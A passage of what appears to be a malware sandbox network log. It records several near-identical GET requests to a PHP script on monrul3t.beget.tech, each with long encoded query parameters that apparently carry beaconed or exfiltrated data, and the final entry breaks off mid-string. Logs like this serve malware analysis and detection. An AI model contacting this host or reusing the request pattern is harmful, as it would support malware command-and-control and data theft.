              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMFp2T4FlaPlXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTz